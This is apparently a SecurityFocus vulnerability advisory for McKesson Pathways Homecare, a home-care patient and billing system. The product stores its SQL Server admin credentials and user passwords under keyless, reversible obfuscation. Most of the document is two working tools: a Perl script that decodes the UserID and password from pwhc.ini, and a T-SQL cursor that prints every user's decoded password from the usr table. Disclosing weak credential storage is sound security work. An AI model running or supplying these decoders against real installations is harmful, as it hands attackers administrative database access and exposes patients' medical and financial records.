
source: https://www.securityfocus.com/bid/3653/info
|
|
|
|
McKesson Pathways Homecare is a client/server application which is used to track patient information, billing information and medical records for home care patients.
|
|
|
|
The administrative (SQL Server) username and password are stored in obfuscated form in the pwhc.ini file on the client system. The scheme is not real encryption: each byte of the reversed value is shifted by a fixed, position-dependent offset that depends only on the value's length, and no secret key is involved. Anyone who can read the file can therefore recover both values with the script below.
|
|
|
|
For the SQL Server account stored in pwhc.ini (Perl; run against a copy of the client's .ini file):
|
|
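#!/usr/bin/perl
################################################################################
# pwhc_crack.pl -- Extracts the SQL Server UserID/Password from a Pathways
# Homecare PWHC.ini file.
#
# Both values are stored under a keyless, fixed-schedule byte shift (see
# decrypt() below), so anyone who can read the client's PWHC.ini can recover
# them -- there is no secret to brute-force.
#
# Usage: pwhc_crack.pl [path/to/pwhc.ini]      (defaults to ./pwhc.ini)
################################################################################

use strict;
use warnings;

# The .ini path may be given on the command line; otherwise keep the
# original default of a pwhc.ini in the current directory.
my $ini_path = @ARGV ? $ARGV[0] : 'pwhc.ini';

# Three-argument open with a lexical handle: a user-supplied path can never
# be misread as a mode prefix or a pipe, which a two-argument open allows.
open my $ini, '<', $ini_path
    or die "Unable to open .ini file '$ini_path': $!\n";

# decrypt() historically read the current line from $_, so the loop keeps
# $_ as the line and also passes it explicitly to keep both conventions working.
while (<$ini>) {
    chomp;
    if (/^UserID/)   { print "UserID: ",   decrypt($_), "\n"; }
    if (/^Password/) { print "Password: ", decrypt($_), "\n"; }
}

close $ini;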
|
|
|
|
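# decrypt(LINE) -- undo the PWHC.ini obfuscation for one "Name=Value" line.
#
# The stored value is the plaintext reversed, with a per-position offset
# subtracted from each byte.  The offsets are fixed and depend only on the
# parity of the value's length:
#   odd  length: 3, 8, 5, 10, 7, 12, ...   (start at 3; alternately +5, -3)
#   even length: 7, 4, 9,  6, 11,  8, ...  (start at 7; alternately -3, +5)
# No key material is involved, which is why the scheme is reversible by
# anyone with read access to the file.
#
# Takes the raw ini line (e.g. "Password=oZ").  For compatibility with the
# original script, which ignored its argument and read $_, it falls back
# to $_ when called without one.
# Returns the decoded value as a byte string; an empty string when the line
# has no "=" or an empty value.
sub decrypt {
    my ($line) = @_;
    $line = $_ unless defined $line;

    # Split on the first "=" only, so a value that itself contains "=" is kept.
    my (undef, $value) = split /=/, $line, 2;
    $value = '' unless defined $value;
    return '' if $value eq '';

    # Work on the reversed value as unsigned bytes and mask the sum back to
    # one byte; this yields exactly the wraparound the original got from
    # packing over-range signed chars, without the "wrapped" warnings.
    my @bytes = unpack 'C*', (scalar reverse $value);

    # Initial offset and the two alternating increments, chosen by parity.
    my ($key, @step) = (@bytes % 2) ? (3, 5, -3) : (7, -3, 5);
    for my $i (0 .. $#bytes) {
        $bytes[$i] = ($bytes[$i] + $key) & 0xFF;
        # After position $i the schedule alternates: $step[0] after even
        # positions (0, 2, ...), $step[1] after odd ones.
        $key += $step[$i % 2];
    }

    return pack 'C*', reverse @bytes;
}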
|
|
|
|
For the Visual Basic client's user accounts, stored in the usr table of the application database (T-SQL; run with read access to that table):
|
|
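-- Decode the obfuscated passwords stored in the application's usr table.
-- Run against the Pathways Homecare database with a login that can read
-- usr(usrID, pwd).  Nothing is modified; the cursor is read-only.
--
-- Scheme: the stored value is the plaintext reversed, with a per-position
-- offset subtracted from each byte.  The offset for position p is
-- ASCII(key[p]) - 65, and the key string is picked purely by the parity of
-- the value's length.  No secret is involved, so read access to the table
-- is enough to recover every password.
--
-- NOTE(review): @cryptstr is varchar(15) as in the original; a pwd value
-- longer than that would be silently truncated -- widen it if the column is.
SET NOCOUNT ON

DECLARE @evenkey  varchar(15)
DECLARE @oddkey   varchar(15)
DECLARE @key      varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length   tinyint
-- Spelled @usrID everywhere: the original declared @usrid but used @usrID,
-- which fails under a case-sensitive collation.
DECLARE @usrID    varchar(30)

SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey  = 'CGEIGKIMKOMQOSQ'

-- LOCAL FAST_FORWARD: read-only, forward-only, scoped to this batch.
DECLARE pwd_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr

WHILE (@@FETCH_STATUS = 0)
BEGIN
    SET @position = 1
    SET @length = datalength(@cryptstr)

    -- Odd-length values use one key string, even-length values the other.
    IF ((@length % 2) = 1) SET @key = @oddkey
    ELSE SET @key = @evenkey

    -- Walk the value from its last byte to its first (hence
    -- @length - @position + 1) and add the key offset for that position.
    WHILE (@position <= @length)
    BEGIN
        SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
            CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
                 + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
        SET @position = @position + 1
    END

    PRINT @usrID + ' : ' + @cryptstr
    FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END

-- Close before deallocating so the cursor's resources are released cleanly.
CLOSE pwd_cursor
DEALLOCATE pwd_cursor
GO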